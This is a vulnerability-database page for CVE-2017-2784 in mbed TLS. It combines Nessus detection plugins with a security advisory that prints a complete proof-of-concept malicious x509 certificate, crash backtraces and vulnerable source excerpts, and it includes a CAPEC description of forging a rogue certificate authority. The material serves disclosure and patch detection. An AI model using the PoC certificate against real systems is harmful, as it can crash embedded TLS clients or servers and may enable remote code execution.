Vulnerabilities > CVE-2017-2784 - Improper Certificate Validation vulnerability in ARM Mbed TLS
Attack vector
NETWORK Attack complexity
MEDIUM Privileges required
NONE Confidentiality impact
PARTIAL Integrity impact
PARTIAL Availability impact
PARTIAL Summary
An exploitable free of a stack pointer vulnerability exists in the x509 certificate parsing code of ARM mbed TLS before 1.3.19, 2.x before 2.1.7, and 2.4.x before 2.4.2. A specially crafted x509 certificate, when parsed by mbed TLS library, can cause an invalid free of a stack pointer leading to a potential remote code execution. In order to exploit this vulnerability, an attacker can act as either a client or a server on a network to deliver malicious x509 certificates to vulnerable applications.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Creating a Rogue Certificate Authority Certificate An attacker exploits a weakness in the MD5 hash algorithm (weak collision resistance) to generate a certificate signing request (CSR) that contains collision blocks in the "to be signed" part. The attacker specially crafts two different, but valid X.509 certificates that when hashed with the MD5 algorithm would yield the same value. The attacker then sends the CSR for one of the certificates to the Certification Authority which uses the MD5 hashing algorithm. That request is completely valid and the Certificate Authority issues an X.509 certificate to the attacker which is signed with its private key. An attacker then takes that signed blob and inserts it into another X.509 certificate that the attacker generated. Due to the MD5 collision, both certificates, though different, hash to the same value and so the signed blob works just as well in the second certificate. The net effect is that the attackers' second X.509 certificate, which the Certification Authority has never seen, is now signed and validated by that Certification Authority. To make the attack more interesting, the second certificate could be not just a regular certificate, but rather itself a signing certificate. Thus the attacker is able to start their own Certification Authority that is anchored in its root of trust in the legitimate Certification Authority that has signed the attackers' first X.509 certificate. If the original Certificate Authority was accepted by default by browsers, so will now the Certificate Authority set up by the attacker and of course any certificates that it signs. So the attacker is now able to generate any SSL certificates to impersonate any web server, and the user's browser will not issue any warning to the victim. This can be used to compromise HTTPS communications and other types of systems where PKI and X.509 certificates may be used (e.g., VPN, IPSec) .
Nessus
NASL family SuSE Local Security Checks NASL id OPENSUSE-2017-372.NASL description This update to mbedtls 1.3.19 fixes security issues and bugs. The following vulnerability was fixed : CVE-2017-2784: A remote user could have used a specially crafted certificate to cause mbedtls to free a buffer allocated on the stack when verifying the validity of public key with a secp224k1 curve, which could have allowed remote code execution on some platforms (boo#1029017) The following non-security changes are included : - Add checks to prevent signature forgeries for very large messages while using RSA through the PK module in 64-bit systems. - Fixed potential livelock during the parsing of a CRL in PEM format last seen 2020-06-05 modified 2017-03-23 plugin id 97905 published 2017-03-23 reporter This script is Copyright (C) 2017-2020 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/97905 title openSUSE Security Update : mbedtls (openSUSE-2017-372) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from openSUSE Security Update openSUSE-2017-372. # # The text description of this plugin is (C) SUSE LLC. # include("compat.inc"); if (description) { script_id(97905); script_version("3.4"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04"); script_cve_id("CVE-2017-2784"); script_name(english:"openSUSE Security Update : mbedtls (openSUSE-2017-372)"); script_summary(english:"Check for the openSUSE-2017-372 patch"); script_set_attribute( attribute:"synopsis", value:"The remote openSUSE host is missing a security update." ); script_set_attribute( attribute:"description", value: "This update to mbedtls 1.3.19 fixes security issues and bugs. The following vulnerability was fixed : CVE-2017-2784: A remote user could have used a specially crafted certificate to cause mbedtls to free a buffer allocated on the stack when verifying the validity of public key with a secp224k1 curve, which could have allowed remote code execution on some platforms (boo#1029017) The following non-security changes are included : - Add checks to prevent signature forgeries for very large messages while using RSA through the PK module in 64-bit systems. - Fixed potential livelock during the parsing of a CRL in PEM format" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1029017" ); script_set_attribute( attribute:"solution", value:"Update the affected mbedtls packages." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libmbedtls9"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libmbedtls9-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libmbedtls9-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libmbedtls9-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:mbedtls-debugsource"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:mbedtls-devel"); script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:42.1"); script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:42.2"); script_set_attribute(attribute:"patch_publication_date", value:"2017/03/22"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/03/23"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2017-2020 Tenable Network Security, Inc."); script_family(english:"SuSE Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/SuSE/release"); if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE"); if (release !~ "^(SUSE42\.1|SUSE42\.2)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "42.1 / 42.2", release); if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); ourarch = get_kb_item("Host/cpu"); if (!ourarch) audit(AUDIT_UNKNOWN_ARCH); if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch); flag = 0; if ( rpm_check(release:"SUSE42.1", reference:"libmbedtls9-1.3.19-15.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"libmbedtls9-debuginfo-1.3.19-15.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"mbedtls-debugsource-1.3.19-15.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"mbedtls-devel-1.3.19-15.1") ) flag++; if ( rpm_check(release:"SUSE42.1", cpu:"x86_64", reference:"libmbedtls9-32bit-1.3.19-15.1") ) flag++; if ( rpm_check(release:"SUSE42.1", cpu:"x86_64", reference:"libmbedtls9-debuginfo-32bit-1.3.19-15.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libmbedtls9-1.3.19-15.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libmbedtls9-debuginfo-1.3.19-15.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"mbedtls-debugsource-1.3.19-15.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"mbedtls-devel-1.3.19-15.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libmbedtls9-32bit-1.3.19-15.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libmbedtls9-debuginfo-32bit-1.3.19-15.1") ) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get()); else security_warning(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "libmbedtls9 / libmbedtls9-32bit / libmbedtls9-debuginfo / etc"); }NASL family Fedora Local Security Checks NASL id FEDORA_2017-922652DD9C.NASL description - Update to 2.4.2 - CVE-2017-2784 Release notes: https://tls.mbed.org/tech-updates/releases/mbedtls-2.4.2-2.1.7-and-1.3 .19-released Security notes: https://tls.mbed.org/tech-updates/security-advisories/mbedtls-security -advisory-2017-01 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-05 modified 2017-03-27 plugin id 97969 published 2017-03-27 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/97969 title Fedora 24 : mbedtls (2017-922652dd9c) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Fedora Security Advisory FEDORA-2017-922652dd9c. # include("compat.inc"); if (description) { script_id(97969); script_version("3.5"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04"); script_cve_id("CVE-2017-2784"); script_xref(name:"FEDORA", value:"2017-922652dd9c"); script_name(english:"Fedora 24 : mbedtls (2017-922652dd9c)"); script_summary(english:"Checks rpm output for the updated package."); script_set_attribute( attribute:"synopsis", value:"The remote Fedora host is missing a security update." ); script_set_attribute( attribute:"description", value: " - Update to 2.4.2 - CVE-2017-2784 Release notes: https://tls.mbed.org/tech-updates/releases/mbedtls-2.4.2-2.1.7-and-1.3 .19-released Security notes: https://tls.mbed.org/tech-updates/security-advisories/mbedtls-security -advisory-2017-01 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues." ); script_set_attribute( attribute:"see_also", value:"https://bodhi.fedoraproject.org/updates/FEDORA-2017-922652dd9c" ); # https://tls.mbed.org/tech-updates/security-advisories/mbedtls-security-advisory-2017-01 script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?a5dfef80" ); script_set_attribute( attribute:"solution", value:"Update the affected mbedtls package." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:mbedtls"); script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:24"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/04/20"); script_set_attribute(attribute:"patch_publication_date", value:"2017/03/24"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/03/27"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Fedora Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora"); os_ver = pregmatch(pattern: "Fedora.*release ([0-9]+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora"); os_ver = os_ver[1]; if (! preg(pattern:"^24([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 24", "Fedora " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu); flag = 0; if (rpm_check(release:"FC24", reference:"mbedtls-2.4.2-1.fc24")) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_WARNING, extra : rpm_report_get() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "mbedtls"); }NASL family Gentoo Local Security Checks NASL id GENTOO_GLSA-201706-18.NASL description The remote host is affected by the vulnerability described in GLSA-201706-18 (mbed TLS: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in mbed TLS. Please review the CVE identifiers referenced below for details. Impact : A remote attacker could possibly execute arbitrary code with the privileges of the process, or cause a Denial of Service condition. Workaround : There is no known workaround at this time. last seen 2020-06-01 modified 2020-06-02 plugin id 100944 published 2017-06-21 reporter This script is Copyright (C) 2017-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/100944 title GLSA-201706-18 : mbed TLS: Multiple vulnerabilities (SLOTH) code # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Gentoo Linux Security Advisory GLSA 201706-18. # # The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc. # and licensed under the Creative Commons - Attribution / Share Alike # license. See http://creativecommons.org/licenses/by-sa/3.0/ # include("compat.inc"); if (description) { script_id(100944); script_version("$Revision: 3.2 $"); script_cvs_date("$Date: 2018/01/26 17:15:57 $"); script_cve_id("CVE-2015-5291", "CVE-2015-7575", "CVE-2017-2784"); script_xref(name:"GLSA", value:"201706-18"); script_name(english:"GLSA-201706-18 : mbed TLS: Multiple vulnerabilities (SLOTH)"); script_summary(english:"Checks for updated package(s) in /var/db/pkg"); script_set_attribute( attribute:"synopsis", value: "The remote Gentoo host is missing one or more security-related patches." ); script_set_attribute( attribute:"description", value: "The remote host is affected by the vulnerability described in GLSA-201706-18 (mbed TLS: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in mbed TLS. Please review the CVE identifiers referenced below for details. Impact : A remote attacker could possibly execute arbitrary code with the privileges of the process, or cause a Denial of Service condition. Workaround : There is no known workaround at this time." ); script_set_attribute( attribute:"see_also", value:"https://security.gentoo.org/glsa/201706-18" ); script_set_attribute( attribute:"solution", value: "All mbed TLS users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose '>=net-libs/mbedtls-2.4.2'" ); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:mbedtls"); script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux"); script_set_attribute(attribute:"patch_publication_date", value:"2017/06/20"); script_set_attribute(attribute:"in_the_news", value:"true"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/06/21"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc."); script_family(english:"Gentoo Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("qpkg.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo"); if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (qpkg_check(package:"net-libs/mbedtls", unaffected:make_list("ge 2.4.2"), vulnerable:make_list("lt 2.4.2"))) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get()); else security_warning(0); exit(0); } else { tested = qpkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "mbed TLS"); }NASL family Fedora Local Security Checks NASL id FEDORA_2017-718154E0F2.NASL description - Update to 2.4.2 - CVE-2017-2784 Release notes: https://tls.mbed.org/tech-updates/releases/mbedtls-2.4.2-2.1.7-and-1.3 .19-released Security notes: https://tls.mbed.org/tech-updates/security-advisories/mbedtls-security -advisory-2017-01 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-05 modified 2017-07-17 plugin id 101654 published 2017-07-17 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/101654 title Fedora 26 : mbedtls (2017-718154e0f2) NASL family Fedora Local Security Checks NASL id FEDORA_2017-9ED1B89530.NASL description - Update to 2.4.2 - CVE-2017-2784 Release notes: https://tls.mbed.org/tech-updates/releases/mbedtls-2.4.2-2.1.7-and-1.3 .19-released Security notes: https://tls.mbed.org/tech-updates/security-advisories/mbedtls-security -advisory-2017-01 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-05 modified 2017-03-27 plugin id 97970 published 2017-03-27 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/97970 title Fedora 25 : mbedtls (2017-9ed1b89530)
Seebug
| bulletinFamily | exploit |
| description | ### Summary An exploitable free of a stack pointer vulnerability exists in the x509 certificate parsing code of ARM mbedTLS 2.4.0. A specially crafted x509 certificate, when parsed by mbedTLS library, can cause an invalid free of a stack pointer leading to a potential remote code execution. In order to exploit this vulnerability, an attacker can act as either a client or a server on a network to deliver malicious x509 certificates to vulnerable applications. ### Tested Versions ARM mbedTLS 2.4.0. ### Product URLs https://tls.mbed.org/ ### CVSSv3 Score 8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A ### CWE CWE-590: Free of Memory not on the Heap ### Details mbedTLS, previously known as PolarSSL is an SSL and TLS implementation aimed at embedded devices and as such has few dependencies and small footprint. It is especially popular as a way of providing transport layer security to embedded web servers such as GoAhead, for example. The vulnerability exists in the part of the code responsible for handling elliptic curve cryptographic keys. It can be triggered by supplying a specially crafted x509 certificate to the target which performs a series of checks on the certificate and supplied public key. In the provided proof-of-concept x509 certificate a curve of type `secp224k1` is specified: ``` openssl x509 -inform DER -text -in poc.der Certificate: Data: Version: 1 (0x0) Serial Number: 11350574552211845977 (0x9d85576ad52cf359) Signature Algorithm: ecdsa-with-SHA256 Issuer: C=AU, ST=Some-State, O=Internet Widgits Pty Ltd Validity Not Before: Jan 12 21:21:28 2017 GMT Not After : Jan 12 21:21:28 2018 GMT Subject: C=AU, ST=Some-State, O=Internet Widgits Pty Ltd Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Unable to load Public Key Signature Algorithm: ecdsa-with-SHA256 30:3d:02:1d:00:d1:46:8a:7d:f8:d1:03:a7:a9:90:9a:2d:09: 2f:e9:15:b5:5e:3a:14:ac:23:20:41:6e:0c:d0:c3:02:1c:10: 1c:89:d4:0d:a3:04:0b:53:33:e4:fb:75:44:1d:a4:a3:0b:f9: d9:45:47:ff:99:d2:6f:ae:49 -----BEGIN CERTIFICATE----- MIIBZzCCARUCCQCdhVdq1SzzWTAKBggqhkjOPQQDAjBFMQswCQYDVQQGEwJBVTET MBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0cyBQ dHkgTHRkMB4XDTE3MDExMjIxMjEyOFoXDTE4MDExMjIxMjEyOFowRTELMAkGA1UE BhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0IFdp ZGdpdHMgUHR5IEx0ZDBOMBAGByqGSM49AgEGBSuBBAAgAzoABAAAAADiAAAAAAAA uzoT1DsyMzc4OTUyHwYDVR0QAQH/BAgwBgEB/wIBCjAiBgNVHQ4EGwRjb8DAMAoG CCqGSM49BAMCA0AAMD0CHQDRRop9+NEDp6mQmi0JL+kVtV46FKwjIEFuDNDDAhwQ HInUDaMEC1Mz5Pt1RB2kowv52UVH/5nSb65J -----END CERTIFICATE----- ``` Notice that `openssl x509` tool fails to parse the public key properly. While parsing the certificate, and public key specifically, mbedTLS library will identify the curve in question as `secp224k1` while validating the public key and will invoke a numer of elliptic curve arithmetic in order to verify the key, as can be seen from the context of the crashing application: ``` #0 0x00007ffff7a43428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 #1 0x00007ffff7a4502a in __GI_abort () at abort.c:89 #2 0x00007ffff7a857ea in __libc_message (do_abort=do_abort@entry=2, fmt=fmt@entry=0x7ffff7b9e2e0 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175 #3 0x00007ffff7a8de0a in malloc_printerr (ar_ptr=<optimized out>, ptr=<optimized out>, str=0x7ffff7b9e3f0 "double free or corruption (out)", action=3) at malloc.c:5004 #4 _int_free (av=<optimized out>, p=<optimized out>, have_lock=0) at malloc.c:3865 #5 0x00007ffff7a9198c in __GI___libc_free (mem=<optimized out>) at malloc.c:2966 #6 0x0000000000429785 in mbedtls_mpi_grow (X=0x7fffffffcc30, nblimbs=4) at bignum.c:130 #7 0x000000000042c08a in mbedtls_mpi_mul_mpi (X=0x7fffffffcc30, A=0x7fffffffcba0, B=0x7fffffffcc50) at bignum.c:1187 #8 0x00000000004422c7 in ecp_mod_koblitz (N=0x7fffffffcd40, Rp=0x6882e0 <Rp.3115>, p_limbs=4, adjust=1, shift=32, mask=4294967295) at ecp_curves.c:1247 #9 0x0000000000442546 in ecp_mod_p224k1 (N=0x7fffffffcd40) at ecp_curves.c:1304 #10 0x0000000000437534 in ecp_modp (N=0x7fffffffcd40, grp=0x68b6e0) at ecp.c:677 #11 0x000000000043baf1 in ecp_check_pubkey_sw (grp=0x68b6e0, pt=0x68b7f0) at ecp.c:1660 #12 0x000000000043bfef in mbedtls_ecp_check_pubkey (grp=0x68b6e0, pt=0x68b7f0) at ecp.c:1774 #13 0x000000000044b57f in pk_get_ecpubkey (p=0x7fffffffce78, end=0x68b53d "0\n\006\b*\206H\316=\004\003\002\003@", key=0x68b6e0) at pkparse.c:489 #14 0x000000000044b957 in mbedtls_pk_parse_subpubkey (p=0x7fffffffce78, end=0x68b53d "0\n\006\b*\206H\316=\004\003\002\003@", pk=0x7fffffffd568) at pkparse.c:623 #15 0x00000000004233c8 in x509_crt_parse_der_core (crt=0x7fffffffd420, buf=0x68c660 "0\202\001g0\202\001\025\002\t", buflen=363) at x509_crt.c:821 #16 0x000000000042378a in mbedtls_x509_crt_parse_der (chain=0x7fffffffd420, buf=0x68c660 "0\202\001g0\202\001\025\002\t", buflen=363) at x509_crt.c:952 #17 0x0000000000423879 in mbedtls_x509_crt_parse (chain=0x7fffffffd420, buf=0x68c660 "0\202\001g0\202\001\025\002\t", buflen=363) at x509_crt.c:995 #18 0x0000000000423a1f in mbedtls_x509_crt_parse_file (chain=0x7fffffffd420, path=0x7fffffffe85f "/ramdisk/poc.der") at x509_crt.c:1094 #19 0x0000000000401d66 in main (argc=3, argv=0x7fffffffe5e8) at x509/cert_app.c:299 ``` In the above output, the application is crashing due to invalid call to free inside `mbedtls_mpi_grow` function: ``` int mbedtls_mpi_grow( mbedtls_mpi *X, size_t nblimbs ) { mbedtls_mpi_uint *p; ... if( X->n < nblimbs ) { if( ( p = (mbedtls_mpi_uint*)mbedtls_calloc( nblimbs, ciL ) ) == NULL ) return( MBEDTLS_ERR_MPI_ALLOC_FAILED ); if( X->p != NULL ) { memcpy( p, X->p, X->n * ciL ); mbedtls_mpi_zeroize( X->p, X->n ); mbedtls_free( X->p ); [1] } .... } ``` At [1] a wrapper to libc `free` is called with `X->p` as parameter. Going backwards through the callstack and code, it can be concluded that final values of X and `X->p` are actually initialized in `ecp_mod_koblitz` function: ``` static inline int ecp_mod_koblitz( mbedtls_mpi *N, mbedtls_mpi_uint *Rp, size_t p_limbs, size_t adjust, size_t shift, mbedtls_mpi_uint mask ) { int ret; size_t i; mbedtls_mpi M, R; mbedtls_mpi_uint Mp[P_KOBLITZ_MAX + P_KOBLITZ_R]; [1] ... /* Common setup for M */ M.s = 1; M.p = Mp; [2] /* M = A1 */ M.n = N->n - ( p_limbs - adjust ); ... MBEDTLS_MPI_CHK( mbedtls_mpi_mul_mpi( &M, &M, &R ) ); [3] ... ``` At [1], we can observe variable `Mp` being allocated on the stack. It’s assigned to `M.p` at [2] and at [3], a call to `mbedtls_mpi_mul_mpi` is made, which eventually leads to invalid free. This can also be confirmed in the debugger: ``` Breakpoint 1, mbedtls_mpi_grow (X=0x7fffffffcc30, nblimbs=0x5) at bignum.c:118 118 if( nblimbs > MBEDTLS_MPI_MAX_LIMBS ) gdb-peda$ p X->p $7 = (mbedtls_mpi_uint *) 0x7fffffffcc70 gdb-peda$ vmmap X->p Warning: not found or cannot access procfs gdb-peda$ vmmap 0x7fffffffcc70 Start End Perm Name 0x00007ffffffde000 0x00007ffffffff000 rw-p [stack] gdb-peda$ bt #0 mbedtls_mpi_grow (X=0x7fffffffcc30, nblimbs=0x5) at bignum.c:118 #1 0x000000000042c08a in mbedtls_mpi_mul_mpi (X=0x7fffffffcc30, A=0x7fffffffcba0, B=0x7fffffffcc50) at bignum.c:1187 #2 0x00000000004422c7 in ecp_mod_koblitz (N=0x7fffffffcd20, Rp=0x6882e0 <Rp.3115>, p_limbs=0x4, adjust=0x1, shift=0x20, mask=0xffffffff) at ecp_curves.c:1247 #3 0x0000000000442546 in ecp_mod_p224k1 (N=0x7fffffffcd20) at ecp_curves.c:1304 #4 0x0000000000437534 in ecp_modp (N=0x7fffffffcd20, grp=0x68b6e0) at ecp.c:677 #5 0x000000000043ba9b in ecp_check_pubkey_sw (grp=0x68b6e0, pt=0x68b7f0) at ecp.c:1659 #6 0x000000000043bfef in mbedtls_ecp_check_pubkey (grp=0x68b6e0, pt=0x68b7f0) at ecp.c:1774 #7 0x000000000044b57f in pk_get_ecpubkey (p=0x7fffffffce78, end=0x68b53d "0\n\006\b*\206H\316=\004\003\002\003@", key=0x68b6e0) at pkparse.c:489 #8 0x000000000044b957 in mbedtls_pk_parse_subpubkey (p=0x7fffffffce78, end=0x68b53d "0\n\006\b*\206H\316=\004\003\002\003@", pk=0x7fffffffd568) at pkparse.c:623 #9 0x00000000004233c8 in x509_crt_parse_der_core (crt=0x7fffffffd420, buf=0x68c660 "0\202\001g0\202\001\025\002\t", buflen=0x16b) at x509_crt.c:821 #10 0x000000000042378a in mbedtls_x509_crt_parse_der (chain=0x7fffffffd420, buf=0x68c660 "0\202\001g0\202\001\025\002\t", buflen=0x16b) at x509_crt.c:952 #11 0x0000000000423879 in mbedtls_x509_crt_parse (chain=0x7fffffffd420, buf=0x68c660 "0\202\001g0\202\001\025\002\t", buflen=0x16b) at x509_crt.c:995 #12 0x0000000000423a1f in mbedtls_x509_crt_parse_file (chain=0x7fffffffd420, path=0x7fffffffe85f "/ramdisk/poc.der") at x509_crt.c:1094 #13 0x0000000000401d66 in main (argc=0x3, argv=0x7fffffffe5e8) at x509/cert_app.c:299 #14 0x00007ffff7a2e830 in __libc_start_main (main=0x401722 <main>, argc=0x3, argv=0x7fffffffe5e8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe5d8) at ../csu/libc-start.c:291 #15 0x0000000000401519 in _start () gdb-peda$ ``` Mitigating factor of this vulnerability is the fact that the area of memory pointed to by pointer being freed is zeroed-out just before the free, which does complicate exploitation, but since the library is designed and intended for embedded platforms which might not have modern heap exploitation mitigations in place, we believe it can result in remote code execution in certain environments. The vulnerability can be triggered with the supplied PoC file by opening it in `cert_app` sample application provided with the library. ### Crash Information Valgrind output: ``` valgrind ./cert_app mode=file filename=/ramdisk/poc.der ==28084== Memcheck, a memory error detector ==28084== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. ==28084== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info ==28084== Command: ./cert_app mode=file filename=/ramdisk/poc.der ==28084== . Loading the CA root certificate ... ok (0 skipped) . Loading the certificate(s) ...==28084== Invalid free() / delete / delete[] / realloc() ==28084== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==28084== by 0x429784: mbedtls_mpi_grow (bignum.c:130) ==28084== by 0x42C089: mbedtls_mpi_mul_mpi (bignum.c:1187) ==28084== by 0x4422C6: ecp_mod_koblitz (ecp_curves.c:1247) ==28084== by 0x442545: ecp_mod_p224k1 (ecp_curves.c:1304) ==28084== by 0x437533: ecp_modp (ecp.c:677) ==28084== by 0x43BAF0: ecp_check_pubkey_sw (ecp.c:1660) ==28084== by 0x43BFEE: mbedtls_ecp_check_pubkey (ecp.c:1774) ==28084== by 0x44B57E: pk_get_ecpubkey (pkparse.c:489) ==28084== by 0x44B956: mbedtls_pk_parse_subpubkey (pkparse.c:623) ==28084== by 0x4233C7: x509_crt_parse_der_core (x509_crt.c:821) ==28084== by 0x423789: mbedtls_x509_crt_parse_der (x509_crt.c:952) ==28084== Address 0xffeffebe0 is on thread 1's stack ==28084== in frame #3, created by ecp_mod_koblitz (ecp_curves.c:1212) ==28084== failed ! mbedtls_x509_crt_parse_file returned -19584 ==28084== ==28084== HEAP SUMMARY: ==28084== in use at exit: 32 bytes in 1 blocks ==28084== total heap usage: 25 allocs, 25 frees, 7,447 bytes allocated ==28084== ==28084== LEAK SUMMARY: ==28084== definitely lost: 32 bytes in 1 blocks ==28084== indirectly lost: 0 bytes in 0 blocks ==28084== possibly lost: 0 bytes in 0 blocks ==28084== still reachable: 0 bytes in 0 blocks ==28084== suppressed: 0 bytes in 0 blocks ==28084== Rerun with --leak-check=full to see details of leaked memory ==28084== ==28084== For counts of detected and suppressed errors, rerun with: -v 